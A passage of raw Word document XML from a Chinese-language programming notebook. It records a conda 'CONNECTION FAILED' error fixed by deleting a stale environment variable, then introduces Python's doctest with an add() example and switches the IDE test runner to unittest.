        <w:t>E:\anaconda3\Scripts;C:\msys64\mingw64\bin;C:\Program Files\Java\jdk-11.0.2\bin;C:\Program Files\OpenSSL-Win64\bin;C:\Users\ranja\AppData\Local\Android\Sdk\ndk\25.1.8937393;C:\Program Files (x86)\GnuPG\bin;E:\BiLing\golang-study\bin;C:\Users\ranja\gradle-7.5.1-all\gradle-7.5.1\bin;C:\Program Files\nodejs;C:\Program Files (x86)\Nox\bin;C:\Users\ranja\AppData\Local\Programs\Python\Python37-32\Scripts\;C:\Users\ranja\AppData\Local\Programs\Python\Python37-32\;C:\Python27;C:\Program Files\Bandizip\;C:\Users\ranja\AppData\Roaming\npm;%USERPROFILE%\.dotnet\tools;%MAVEN_HOME%bin;%IntelliJ IDEA Community Edition%;%CATALINA_HOME%\bin;%CATALINA_HOME%\lib;%MAVEN_HOME%\bin;%IntelliJ IDEA%;C:\Program Files (x86)\Nox\bin;%GOPATH%\bin;C:\Users\ranja\protoc-21.5-win64\bin;C:\Program Files\Git;%USERPROFILE%\go\bin;C:\Program Files\Graphviz\bin;C:\phpstudy_pro\Extensions\php\php5.6.9nts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D2155" w14:textId="77777777" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1785EFAC" w14:textId="5D73FFC3" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装时的环境变量（已加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC2BEA" w14:textId="77777777" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22603972" w14:textId="77777777" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD0DFCF" w14:textId="77777777" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3B9A0C" w14:textId="77777777" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFDDADB" w14:textId="77777777" w:rsidR="0058734F" w:rsidRDefault="0058734F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E231543" w14:textId="07F2D8FA" w:rsidR="004B6CBF" w:rsidRDefault="00850B87" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc159779860"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
    </w:p>
    <w:p w14:paraId="0DA2ECB8" w14:textId="77777777" w:rsidR="008C269D" w:rsidRDefault="008C269D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF26E41" w14:textId="63B3D197" w:rsidR="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错无法链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>current_repodata.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F3011" w14:textId="77777777" w:rsidR="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>C:\Users\ranja&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>E:\anaconda3\Scripts\conda.exe create -p E:\anaconda3\envs\yolov5 -y python=3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1863C54F" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Collecting package metadata (current_repodata.json): failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469525F7" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DE4C65" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>CondaHTTPError: HTTP 000 CONNECTION FAILED for url &lt;https://repo.anaconda.com/pkgs/main/win-64/current_repodata.json&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0525AC77" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Elapsed: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115608AE" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C97BE93" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>An HTTP error occurred when trying to retrieve this URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5476CC31" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>HTTP errors are often intermittent, and a simple retry will get you on your way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8455E1" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDF9007" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>If your current network has https://repo.anaconda.com blocked, please file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5169D" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>a support request with your network engineering team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A61561B" w14:textId="77777777" w:rsidR="007232BD" w:rsidRPr="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C25B98" w14:textId="3331382E" w:rsidR="004B6CBF" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'https//repo.anaconda.com/pkgs/main/win-64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B314059" w14:textId="77777777" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68209F4D" w14:textId="2F49FDDF" w:rsidR="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个论坛的最下面一句话找到了解决办法，删除该环境变量后正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0EE036" w14:textId="4DC9A0BC" w:rsidR="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看这个值的设置，推测应该是我很久以前工作鼓捣什么弄的环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD5D95" w14:textId="12A229FF" w:rsidR="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007232BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="436AE278" wp14:editId="662BED30">
            <wp:extent cx="3043343" cy="2294415"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1142728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48535" cy="2298329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7784D5" w14:textId="11D4EC19" w:rsidR="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30722CFC" wp14:editId="69687283">
            <wp:extent cx="2684078" cy="2611369"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="93890019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00199" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2689321" cy="2616470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E7485" w14:textId="77777777" w:rsidR="007232BD" w:rsidRDefault="007232BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6FA073" w14:textId="77777777" w:rsidR="004B6CBF" w:rsidRDefault="004B6CBF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E0B776" w14:textId="7D80C094" w:rsidR="008C269D" w:rsidRDefault="00AB747D" w:rsidP="00AB747D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A1744" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="1DBDAC3C" w14:textId="76DCDDA7" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>doctest</w:t>
      </w:r>
      <w:r w:rsidR="00541447">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：简单文档测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6203D2A2" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="30DC0CBC" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:r w:rsidRPr="00863C8C">
        <w:t xml:space="preserve">doctest </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:t>的一个标准库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959EDB3" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="04E14BE3" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:r w:rsidRPr="00863C8C">
        <w:t xml:space="preserve">doctest </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:t>的主要功能是通过在文档字符串（</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:t>docstring</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:t>）中嵌入示例代码，并将其作为测试来验证代码的正确性。它会自动提取文档中的代码示例，运行这些示例并将其输出与预期结果进行比较。这样，你可以确保文档中的代码和实际运行的结果一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053CFA0" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="251D58C5" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="169C7048" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>def add(a, b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C325B" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F748960" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    Returns the sum of a and b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C70A2E" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DE6C8B" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &gt;&gt;&gt; add(2, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F6BE46" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE82F6" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &gt;&gt;&gt; add(-1, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E22D0D7" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B287CC" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34105FB9" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    return a + b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335020A" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539C1E8F" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274D4791" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    import doctest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958058F" w14:textId="5ABF4391" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    doctest.testmod()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D6B82" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="33D54B46" w14:textId="212F1B9D" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">doctest </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会提取函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文档字符串，执行其中的代码片段</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> add(2, 3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> add(-1, 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并将其结果与预期结果进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D18F13" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="4A7D1436" w14:textId="70F4195E" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过命令行直接运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> doctest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13FFB4" w14:textId="1BD87919" w:rsidR="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C">
      <w:r w:rsidRPr="00863C8C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>python -m doctest your_script.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9A95A" w14:textId="77777777" w:rsidR="00863C8C" w:rsidRPr="00863C8C" w:rsidRDefault="00863C8C" w:rsidP="00863C8C"/>
    <w:p w14:paraId="6B1C43AE" w14:textId="15CA83E9" w:rsidR="00032C7F" w:rsidRPr="00032C7F" w:rsidRDefault="00032C7F" w:rsidP="00032C7F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unittests</w:t>
      </w:r>
      <w:r w:rsidR="00541447">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：常用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697330C3" w14:textId="03229B42" w:rsidR="00AB747D" w:rsidRDefault="00AB747D" w:rsidP="00AB747D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> settings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里设置测试，有时候默认使用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pytest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我这里改成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unittests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A76C7F" w14:textId="6887DD22" w:rsidR="00AB747D" w:rsidRPr="00AB747D" w:rsidRDefault="00AB747D" w:rsidP="00AB747D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F3B55DE" wp14:editId="654ADC3A">
            <wp:extent cx="5274310" cy="3256280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1764210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10147" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId129"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3256280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="121BEAA1" w14:textId="77777777" w:rsidR="00AB747D" w:rsidRDefault="00AB747D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D07FF0" w14:textId="4A9D501F" w:rsidR="001B176D" w:rsidRDefault="001B176D" w:rsidP="009222EB">
